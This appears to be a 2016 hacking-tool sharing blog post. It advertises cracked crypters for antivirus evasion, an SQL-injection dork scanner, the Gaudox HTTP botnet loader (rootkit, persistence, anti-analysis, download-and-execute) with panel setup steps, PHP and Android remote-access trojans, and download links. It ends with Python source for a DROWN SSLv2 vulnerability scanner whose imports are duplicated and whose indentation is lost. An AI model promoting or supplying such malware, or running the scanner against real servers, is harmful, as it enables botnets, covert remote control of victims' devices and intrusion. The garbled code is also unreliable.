Friday, March 11, 2016

Gr3eNoX Exploit Scanner V1.1 + 8500 SQLi Dorks




Download

GALAXY CRYPTER CRACKED v1.0 l ADVANCED C# CRYPTER l FUD l



Download
Password: http://DeceptiveEngineering.info

Apex Crypter V 3.0 - Premium Quality Crypter - ASM [Complete Project]




Download

Aero Crypt - New - Icon Changer - 0/60 FUD [Cracked]

Scan Results : http://razorscanner.com/result.php?id=889931

Gaudox - HTTP Bot (1.1.0.1) | C++/ASM | Ring3 Rootkit | Watchdog | Antis |


[Image: acb1430.jpg]

[Image: bb2c161.png]


[Image: 3194cfd.png]

Builder
[Image: 251b9fb.jpg]
[Image: 27a48f1.jpg]
[Image: 29caf7e.jpg]
[Image: 2c55ddc.jpg]
[Image: a91d043.jpg]

Don't ask me what crypters to use, I cannot give feedback for any crypter as I have never bought one. If you find a native crypter, ask the developer if his crypter is compatible with Gaudox. don't use crypters with dependencies. I will code a native crypter soon.

Gaudox HTTP


Gaudox is a HTTP loader completely coded from scratch in C/C++ language with a few lines of Assembly, which means that it does not require of any dependencies ( C-Runtime, NET Framework, Java VM ). The bot has been fully tested and working on all Windows versions from Windows XP SP2 to Windows 10 (32/64-bit). It is also worth mentioning that I coded this bot with very efficient and stable designed code to handle thousands of connections at once.

Features:

Usermode Rootkit
Bot has Rootkit functionality which hides all bot resources and prevents from being accessed from explorer process. This feature does not drop any to disk, the code is internally embedded in the bot file and injected in the target process from memory. It is also has self-protection that prevents the hooks from being removed by third-party programs or any security tool. This feature is currently working on 32-bit systems.

Persistence/Watchdog
Bot prevents it from being removed from the system by bot killers, security tools or user actions. This feature is currently supporting process protection and working on both 32/64-bit systems but its maximum compatibility is in 32-bit.

Traffic Encrypted
The communication between the bot and the control panel is obfuscated. This prevents middle attacks.

Anti-Analysis/Research
Bot contains several methods for preventing from being analyzed by researchers or unauthorized users. some methods are from preventing static analysis by obfuscating code, data up to detect the presence of debuggers, avoid running the bot in virtualized environments, etc. some methods may not be mentioned.

Commands:

[+] Download and execute (Drop&Exec)
[+] Visit Website (Visible)
[+] Update Client
[+] Uninstall Client


Panel

[Image: 627e2d4.jpg]
[Image: acb1430.jpg]
[Image: bb2c161.png]
[Image: 3194cfd.png]

Builder
[Image: 251b9fb.jpg]
[Image: 27a48f1.jpg]
[Image: 29caf7e.jpg]
[Image: 2c55ddc.jpg]
[Image: a91d043.jpg]

Download (latest version 1.1.0.1)

You must reply to this thread to see the hidden content. 
Any feedback is welcome.

Gaudox v1.1.0.1.exe
MD5: 1AF2E1B11B1D7543A19662F7291856F4
SHA-1: DE5BD976FB5A4B50D8C8739E6B9F286F5B1A4798


1.1.0.1.rar
MD5: F99A3FBDEB1B0CD12BB1E6ED700ADE90
SHA-1: A00A2B6D6C5806C75C5551073283D1218AC017C8

Mirror
You must reply to this thread to see the hidden content. 

How to install:
1) Open the Builder and create a new profile, you will use these values KEY #1 and KEY #2 in the panel.
2) Create a new database (recommended)
2) Open setup.php with browser and complete the form.
3) Delete setup.php and open login.php with browser.
5) When creating the bot clients do not forget to use the same profile you used to install the panel, otherwise the bots will not connect to the panel.

Notes:

1) I highly recommend disabling strict mode in MySQL.
2) I f you test the bot from a local server, the panel may be showing "US" in location, it's not an error, the panel expects to always get an external IP. 

Tut by Jar1: http://hackforums.net/showthread.php?tid=5084324

How to update:

1.1.0.0 to 1.1.0.1+
You will need to install the panel again, sorry for the inconvenience. The database is now the final version and it would be compatible with all future versions ( I hope, unless I have forgotten something or want to add a new feature, in any case I will code a script to update the database ).



XANITY | CHEAPEST & BEST PHP RAT | FUD | NO PORTFORWARD




Download
http://sh.st/R8rNO


Panel Files
http://sh.st/R8r14

Xanity php rat client source




Download

CRYPTER PACK ( 6 Cracked Crypter )

{Smartassembly} 6.6.3.41 Professional Edition [HF-Death]
AegisCrypter Cracked
CodeluxCrypter (use at your own risk)v3.0.1 <--------------R.A.T !!!
Infinity Crypter (BETA) - Cracked by Meth
Kazy Crypter - Cracked by Meth
Morpheus Crypter

VirusScan's:
{Smartassembly} | 0 / 43
{Smartassembly} (Crack) | 10 / 43
AegisCrypter | 16 / 30
AegisCrypter Crack (NulledIOLoader.exe) | 3 / 43
Infinity Crypter | 16 / 30
CodeluxCrypter (use at your own risk) | 24 / 43
CodeluxCrypter (install stub.exe) | 1 / 43
Kazy Crypter | 16 / 43
Morpheus Crypter | 0 / 30




Download

Droid Jack Rat 4.4 Cracked 2016


BT is not present and will not be, as the software is written in Java. To run as Administrator - to open the file in Droidjack.jar DroidJack folder.



Download

SSLv2 Drown Attack Scan

#!/usr/bin/env python

import sys
from enum import Enum
import time
import datetime
import socket
import Crypto.Cipher
import signal
from binascii import hexlify
import base64

#!/usr/bin/env python

import sys
from enum import Enum
import time
import datetime
import socket
import Crypto.Cipher
import signal
from binascii import hexlify
import base64

sys.path.append("./scapy-ssl_tls/")
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
import scapy
from scapy.all import *
from ssl_tls import *
import ssl_tls_crypto

from pyx509.pkcs7.asn1_models.X509_certificate import Certificate
from pyx509.pkcs7_models import X509Certificate, PublicKeyInfo, ExtendedKeyUsageExt
from pyx509.pkcs7.asn1_models.decoder_workarounds import decode

import select

SOCKET_TIMEOUT = 15
SOCKET_RECV_SIZE = 80 * 1024

CON_FAIL = "con fail"
NO_STARTTLS = "no starttls"
NO_TLS = "no tls"
VULN = "vuln"

def timeout(func, args=(), kwargs={}, timeout_duration=1, default=None):
import signal

class TimeoutError(Exception):
pass

def handler(signum, frame):
raise TimeoutError()

# set the timeout handler
signal.signal(signal.SIGALRM, handler)
signal.alarm(timeout_duration)
try:
result = func(*args, **kwargs)
except TimeoutError as exc:
result = default
finally:
signal.alarm(0)

return result

CHALLENGE = 'a' * 16
CLEAR_KEY = '\0' * 11
KEY_ARGUMENT = '\0' * 8

class CipherSuite(object):
@classmethod
def get_string_description(cls):
raise NotImplementedError()

@classmethod
def get_constant(cls):
return eval("SSLv2CipherSuite." + cls.get_string_description())

@classmethod
def get_client_master_key(cls, encrypted_pms):
raise NotImplementedError()

@classmethod
def verify_key(cls, connection_id, server_finished):
raise NotImplementedError()

@classmethod
def get_encrypted_pms(cls, public_key, secret_key):
pkcs1_pubkey = Crypto.Cipher.PKCS1_v1_5.new(public_key)
encrypted_pms = pkcs1_pubkey.encrypt(secret_key)
return encrypted_pms

class RC4Export(CipherSuite):
SECRET_KEY = 'b' * 5

@classmethod
def get_string_description(cls):
return "RC4_128_EXPORT40_WITH_MD5"

@classmethod
def get_client_master_key(cls, public_key):
client_master_key = SSLv2ClientMasterKey(cipher_suite=cls.get_constant(),
encrypted_key=cls.get_encrypted_pms(public_key, cls.SECRET_KEY),
clear_key=CLEAR_KEY)
return client_master_key

@classmethod
def verify_key(cls, connection_id, server_finished):
md5 = MD5.new(CLEAR_KEY + cls.SECRET_KEY + '0' + CHALLENGE + connection_id).digest()
rc4 = Crypto.Cipher.ARC4.new(md5)
if not rc4.decrypt(server_finished[2:]).endswith(CHALLENGE):
return False
return True

class RC4(CipherSuite):
SECRET_KEY = 'b' * 16
CLEAR_KEY = 'a' * 15

@classmethod
def get_string_description(cls):
return "RC4_128_WITH_MD5"

@classmethod
def get_client_master_key(cls, public_key):
client_master_key = SSLv2ClientMasterKey(cipher_suite=cls.get_constant(),
encrypted_key=cls.get_encrypted_pms(public_key, cls.SECRET_KEY),
clear_key=cls.CLEAR_KEY)
return client_master_key

@classmethod
def verify_key(cls, connection_id, server_finished):
md5 = MD5.new((cls.CLEAR_KEY + cls.SECRET_KEY)[:16] + '0' + CHALLENGE + connection_id).digest()
rc4 = Crypto.Cipher.ARC4.new(md5)
if not rc4.decrypt(server_finished[2:]).endswith(CHALLENGE):
return False
return True

class RC2Export(CipherSuite):
SECRET_KEY = 'b' * 5

@classmethod
def get_string_description(cls):
return "RC2_128_CBC_EXPORT40_WITH_MD5"

@classmethod
def get_client_master_key(cls, public_key):
client_master_key = SSLv2ClientMasterKey(cipher_suite=cls.get_constant(),
encrypted_key=cls.get_encrypted_pms(public_key, cls.SECRET_KEY),
key_argument=KEY_ARGUMENT,
clear_key=CLEAR_KEY)
return client_master_key

@classmethod
def verify_key(cls, connection_id, server_finished):
md5 = MD5.new(CLEAR_KEY + cls.SECRET_KEY + '0' + CHALLENGE + connection_id).digest()
rc2 = Crypto.Cipher.ARC2.new(md5, mode=Crypto.Cipher.ARC2.MODE_CBC, IV=KEY_ARGUMENT, effective_keylen=128)
try:
decryption = rc2.decrypt(server_finished[3:])
except ValueError, e:
return False
if decryption[17:].startswith(CHALLENGE):
return True
return False

class DES(CipherSuite):
SECRET_KEY = 'b' * 8

@classmethod
def get_string_description(cls):
return "DES_64_CBC_WITH_MD5"

@classmethod
def get_client_master_key(cls, public_key):
client_master_key = SSLv2ClientMasterKey(cipher_suite=cls.get_constant(),
encrypted_key=cls.get_encrypted_pms(public_key, cls.SECRET_KEY),
key_argument=KEY_ARGUMENT)
return client_master_key

@classmethod
def verify_key(cls, connection_id, server_finished):
md5 = MD5.new(cls.SECRET_KEY + '0' + CHALLENGE + connection_id).digest()
des = Crypto.Cipher.DES.new(md5[:8], mode=Crypto.Cipher.DES.MODE_CBC, IV=KEY_ARGUMENT)
try:
decryption = des.decrypt(server_finished[3:])
except ValueError, e:
return False
if decryption[17:].startswith(CHALLENGE):
return True
return False

cipher_suites = [RC2Export, RC4Export, RC4, DES]

def parse_certificate(derData):
cert = decode(derData, asn1Spec=Certificate())[0]
x509cert = X509Certificate(cert)
tbs = x509cert.tbsCertificate

algType = tbs.pub_key_info.algType
algParams = tbs.pub_key_info.key

if (algType != PublicKeyInfo.RSA):
print 'Certificate algType is not RSA'
raise Exception()

return RSA.construct((long(hexlify(algParams["mod"]), 16), long(algParams["exp"])))

class Protocol(Enum):
BARE_SSLv2 = 1
ESMTP = 2
IMAP = 3
POP3 = 4

def sslv2_connect(ip, port, protocol, cipher_suite, result_additional_data):
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.settimeout(SOCKET_TIMEOUT)
try:
s.connect((ip, port))
except socket.error, e:
try:
s.connect((ip, port))
except socket.error, e:
try:
s.connect((ip, port))
except socket.error, e:
print '%s: Case 1 - port is apparently closed (after 3 tries); Connect failed' % ip
return CON_FAIL

starttls_response = "n/a"
try:
if protocol == Protocol.ESMTP:
banner = s.recv(SOCKET_RECV_SIZE)
s.send("EHLO testing\r\n")
ehlo_response = s.recv(SOCKET_RECV_SIZE)
if "starttls" not in ehlo_response.lower():
print "%s: Case 2a; Server apparently doesn't support STARTTLS" % ip
return NO_STARTTLS
s.send("STARTTLS\r\n")
starttls_response = s.recv(SOCKET_RECV_SIZE)
if protocol == Protocol.IMAP:
banner = s.recv(SOCKET_RECV_SIZE)
s.send(". CAPABILITY\r\n")
banner = s.recv(SOCKET_RECV_SIZE)
if "starttls" not in banner.lower():
print "%s: Case 2b; Server apparently doesn't support STARTTLS" % ip
return NO_STARTTLS
s.send(". STARTTLS\r\n")
starttls_response = s.recv(SOCKET_RECV_SIZE)
if protocol == Protocol.POP3:
banner = s.recv(SOCKET_RECV_SIZE)
s.send("STLS\r\n")
starttls_response = s.recv(SOCKET_RECV_SIZE)
except socket.error, e:
print "Errorx: " + str(e) + " - starttls_response: '" + starttls_response + "'"
print '%s: Case 2c; starttls negotiation failed' % ip
return NO_STARTTLS


client_hello = SSLv2Record()/SSLv2ClientHello(cipher_suites=SSL2_CIPHER_SUITES.keys(),challenge=CHALLENGE)
s.sendall(str(client_hello))

rlist, wlist, xlist = select.select([s], [], [s], SOCKET_TIMEOUT)
if s in xlist or not s in rlist:
print '%s: Case 3a; Server did not response properly to client hello' % ip
s.close()
return "3a: %s" % NO_TLS

try:
server_hello_raw = s.recv(SOCKET_RECV_SIZE)
except socket.error, e:
print '%s: Case 3b; Connection reset by peer when waiting for server hello' % ip
s.close()
return "3b: %s" % NO_TLS

server_hello = timeout(SSL, (server_hello_raw,), timeout_duration=SOCKET_TIMEOUT)
if server_hello == None:
print '%s: Case 3c; Timeout on parsing server hello' % ip
s.close()
return "3c: %s" % NO_TLS

if not SSLv2ServerHello in server_hello:
print '%s: Case 3d; Server hello did not contain server hello' % ip
s.close()
return "3d: %s" % NO_TLS

parsed_server_hello = server_hello[SSLv2ServerHello]
connection_id = parsed_server_hello.connection_id
cert = parsed_server_hello.certificates

try:
public_key = parse_certificate(cert)
except:
# Server could still be vulnerable, we just can't tell, so we assume it isn't
print '%s: Case 4a; Could not extract public key from DER' % ip
s.close()
return "4a: %s" % NO_TLS

server_advertised_cipher_suites = parsed_server_hello.fields["cipher_suites"]
cipher_suite_advertised = cipher_suite.get_constant() in server_advertised_cipher_suites

client_master_key = cipher_suite.get_client_master_key(public_key)
client_key_exchange = SSLv2Record()/client_master_key

s.sendall(str(client_key_exchange))

rlist, wlist, xlist = select.select([s], [], [s], SOCKET_TIMEOUT)
if s in xlist:
print '%s: Case 4b; Exception on socket after sending client key exchange' % ip
s.close()
return "4b: %s" % NO_TLS
if not s in rlist:
print '%s: Case 5; Server did not send finished in time' % ip
s.close()
return "5: %s" % NO_TLS
try:
server_finished = s.recv(SOCKET_RECV_SIZE)
except socket.error, e:
print '%s: Case 4c; Connection reset by peer when waiting for server finished' % ip
s.close()
return "4c: %s" % NO_TLS

if server_finished == '':
print '%s: Case 4d; Empty server_finished' % ip
s.close()
return "4d: %s" % NO_TLS

if not cipher_suite.verify_key(connection_id, server_finished):
print '%s: Case 7; Symmetric key did not successfully verify on server finished message' % ip
return "7: %s" % NO_TLS

s.close()

result_additional_data['cipher_suite_advertised'] = cipher_suite_advertised
return "%s:%s" % (VULN, base64.b64encode(public_key.exportKey(format='DER')))

if __name__ == '__main__':
ip = sys.argv[1]
port = int(sys.argv[2])
scan_id = os.getcwd()
dtime = datetime.datetime.now()
print 'Testing %s on port %s' % (ip, port)

protocol = Protocol.BARE_SSLv2
if len(sys.argv) >= 4:
if sys.argv[3] == '-esmtp':
protocol = Protocol.ESMTP
elif sys.argv[3] == '-imap':
protocol = Protocol.IMAP
elif sys.argv[3] == '-pop3':
protocol = Protocol.POP3
elif sys.argv[3] == '-bare':
protocol = Protocol.BARE_SSLv2
else:
print 'You gave 3 arguments, argument 3 is not a recognized protocol. Bailing out'
sys.exit(1)

vulns = []
for cipher_suite in cipher_suites:

string_description = cipher_suite.get_string_description()
ret_additional_data = {}
ret = sslv2_connect(ip, port, protocol, cipher_suite, ret_additional_data)

if ret.startswith(VULN):
pub_key = ret.replace('%s:' % VULN, '')

cve_string = ""
if not ret_additional_data['cipher_suite_advertised']:
cve_string = " to CVE-2015-3197"
if string_description == "RC4_128_WITH_MD5":
if cve_string == "":
cve_string = " to CVE-2016-0703"
else:
cve_string += " and CVE-2016-0703"

print '%s: Server is vulnerable%s, with cipher %s\n' % (ip, cve_string, string_description)
else:
print '%s: Server is NOT vulnerable with cipher %s, Message: %s\n' % (ip, string_description, ret)